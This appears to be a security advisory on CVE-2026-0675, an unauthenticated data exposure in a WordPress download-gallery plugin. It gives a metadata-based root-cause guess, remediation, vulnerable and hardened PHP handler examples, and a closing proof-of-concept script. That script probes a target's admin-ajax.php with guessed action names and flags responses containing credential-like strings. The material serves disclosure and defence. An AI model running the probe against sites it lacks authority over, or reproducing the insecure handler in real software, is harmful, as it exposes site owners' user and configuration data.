Atomic Edge analysis of CVE-2026-0675 (metadata-based):
The NextGEN Download Gallery plugin for WordPress contains an unauthenticated information exposure vulnerability in all versions up to and including 1.6.2. This vulnerability allows attackers without authentication to extract sensitive user or configuration data from affected WordPress sites. The CVSS score of 5.3 (Medium severity) reflects the network accessibility, low attack complexity, and confidentiality impact of this flaw.
Atomic Edge research infers that the root cause is likely improper access control on a WordPress AJAX endpoint or REST API route registered by the plugin. The CWE-200 classification indicates that the plugin exposes sensitive data without verifying the requester’s authorization. This conclusion is inferred from the vulnerability description and common WordPress plugin patterns rather than from code analysis. The plugin likely registers a callback function via a wp_ajax_nopriv_ hook or the REST API without implementing a capability check, so unauthenticated requests can trigger its data-retrieval functions.
Exploitation involves sending HTTP requests to the WordPress site targeting the vulnerable endpoint. Attackers would likely target /wp-admin/admin-ajax.php with an action parameter matching the plugin’s AJAX hook, such as nextgen_download_gallery_get_data or similar. Alternatively, they might target a REST API route like /wp-json/nextgen-download-gallery/v1/data. The payload would consist of carefully crafted parameters that trigger the information disclosure, potentially including user IDs, post IDs, or configuration option names to extract specific sensitive data.
Remediation requires implementing proper authorization checks before data retrieval. The plugin should verify the current user has appropriate capabilities (using current_user_can()) or implement nonce verification for AJAX endpoints. For REST API endpoints, the permission_callback parameter must validate user permissions. The plugin should also sanitize and validate all input parameters before using them in database queries or file operations.
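The handler pattern that the root-cause inference above describes, placed next to the hardened form the remediation paragraph asks for, as an added example: this is illustrative code written for this page, not the NextGEN Download Gallery plugin's source and not part of the Atomic Edge analysis. The hook names (example_gallery_data, example-gallery/v1), the option name example_gallery_settings and the manage_options capability are assumed placeholders. One caveat the remediation paragraph leaves implicit: a nonce check (check_ajax_referer) only shows the request came from a page WordPress rendered for that visitor; the authorization decision is the current_user_can() test, and on REST routes the permission_callback.

```php
<?php
/**
 * Added example (hypothetical hook/option/capability names): the unauthenticated
 * AJAX handler pattern inferred as the CVE-2026-0675 root cause, and a hardened
 * version of the same handler plus a correctly protected REST route.
 */

// --- Vulnerable pattern -----------------------------------------------------
// wp_ajax_nopriv_* fires for visitors who are NOT logged in. Registering the data
// handler on it with no capability check lets any anonymous POST to
// /wp-admin/admin-ajax.php?action=example_gallery_data read the option back.
add_action( 'wp_ajax_nopriv_example_gallery_data', 'example_gallery_data_insecure' );
add_action( 'wp_ajax_example_gallery_data', 'example_gallery_data_insecure' );
function example_gallery_data_insecure() {
    // The caller picks the option name: no authorization, no input validation.
    $option = isset( $_POST['option'] ) ? $_POST['option'] : 'example_gallery_settings';
    wp_send_json_success( get_option( $option ) );
}

// --- Hardened pattern -------------------------------------------------------
// 1. No wp_ajax_nopriv_ registration at all: data that is not public is only
//    reachable by logged-in users.
add_action( 'wp_ajax_example_gallery_data_v2', 'example_gallery_data_secure' );
function example_gallery_data_secure() {
    // 2. Nonce check stops CSRF. It is NOT an authorization check by itself.
    check_ajax_referer( 'example_gallery_nonce', 'nonce' );

    // 3. Capability check is the actual authorization decision (the CWE-200 gap).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 4. Validate input against an allow-list; never let the caller name the option.
    $allowed = array( 'example_gallery_settings' );
    $key     = isset( $_POST['option'] ) ? sanitize_key( wp_unslash( $_POST['option'] ) ) : '';
    if ( ! in_array( $key, $allowed, true ) ) {
        wp_send_json_error( array( 'message' => 'invalid option' ), 400 );
    }
    wp_send_json_success( get_option( $key ) );
}

// --- REST API route ---------------------------------------------------------
// permission_callback is required and must return the authorization result.
// Passing '__return_true' here would reproduce the unauthenticated exposure.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example-gallery/v1', '/data', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => function ( WP_REST_Request $request ) {
            // gallery_id has already been sanitized/validated by the 'args' schema below.
            $gallery_id = $request->get_param( 'gallery_id' );
            return rest_ensure_response( array(
                'gallery_id' => $gallery_id,
                'settings'   => get_option( 'example_gallery_settings' ),
            ) );
        },
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
        'args' => array(
            'gallery_id' => array(
                'required'          => true,
                'type'              => 'integer',
                'sanitize_callback' => 'absint',
                'validate_callback' => function ( $value ) {
                    return is_numeric( $value ) && (int) $value > 0;
                },
            ),
        ),
    ) );
} );
```

The nonce consumed by check_ajax_referer() would be created with wp_create_nonce( 'example_gallery_nonce' ) and handed to the front-end script via wp_localize_script(). The REST route's args block is the input-validation half of the remediation: absint() and the validate_callback run before the callback ever sees gallery_id, so the handler body only deals with a positive integer.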
Successful exploitation exposes sensitive WordPress site data to unauthenticated attackers. This could include user email addresses, hashed passwords, API keys, database credentials from configuration files, or private media metadata. While the vulnerability does not directly enable privilege escalation or remote code execution, the exposed information could facilitate further attacks such as credential stuffing, social engineering, or targeted exploitation of other vulnerabilities.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-0675 - NextGEN Download Gallery <= 1.6.2 - Unauthenticated Information Exposure

/**
 * Proof of Concept for CVE-2026-0675
 * This script attempts to exploit the unauthenticated information exposure vulnerability
 * in the NextGEN Download Gallery WordPress plugin.
 *
 * ASSUMPTIONS (based on metadata analysis):
 * 1. The plugin registers an AJAX endpoint without proper authorization checks
 * 2. The endpoint responds to unauthenticated requests (wp_ajax_nopriv_ hook)
 * 3. The endpoint returns sensitive data when triggered with specific parameters
 * 4. Common AJAX action names based on plugin slug are tested
 */

$target_url = 'https://vulnerable-site.com'; // CHANGE THIS

// Common AJAX action patterns for the NextGEN Download Gallery plugin (guessed; see assumption 4)
$action_patterns = [
    'nextgen_download_gallery_get_data',
    'ngg_download_gallery',
    'nextgen_download',
    'ngg_download',
    'download_gallery',
    'nextgen_gallery_download'
];

// Common parameters that might trigger data exposure
$test_params = [
    'id'         => '1',
    'user_id'    => '1',
    'post_id'    => '1',
    'option'     => 'admin_email',
    'data'       => 'users',
    'type'       => 'config',
    'file'       => 'config',
    'gallery_id' => '1'
];

echo "[+] Testing target: $target_url\n";
echo "[+] Testing common AJAX endpoints for information exposure\n\n";

foreach ($action_patterns as $action) {
    $url = $target_url . '/wp-admin/admin-ajax.php';
    $post_data = array_merge(['action' => $action], $test_params);
    echo "[*] Testing action: $action\n";

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // The PoC disables TLS verification; this also leaves the tester's own traffic open to interception.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($http_code == 200 && !empty($response)) {
        // Check if the response contains potentially sensitive data.
        // These substrings are coarse heuristics ('key', 'admin', 'wp_' also match benign output),
        // hence the manual-review note at the end.
        $sensitive_indicators = [
            'user_email', 'user_login', 'user_pass', 'admin',
            'wp_', 'password', 'secret', 'key', 'token',
            'database', 'DB_', 'localhost', '127.0.0.1'
        ];
        $found_sensitive = false;
        foreach ($sensitive_indicators as $indicator) {
            if (stripos($response, $indicator) !== false) {
                $found_sensitive = true;
                break;
            }
        }

        if ($found_sensitive) {
            echo "[!] POTENTIAL VULNERABILITY DETECTED\n";
            echo "[!] Action: $action returned potentially sensitive data\n";
            echo "[!] Response preview: " . substr($response, 0, 500) . "...\n\n";
        } else {
            echo "[+] Action $action responded but no obvious sensitive data detected\n";
            echo "[+] Response: " . substr($response, 0, 200) . "...\n\n";
        }
    } else {
        echo "[-] Action $action returned HTTP $http_code or empty response\n\n";
    }
}

echo "[+] Testing complete. Manual review of responses is required.\n";
?>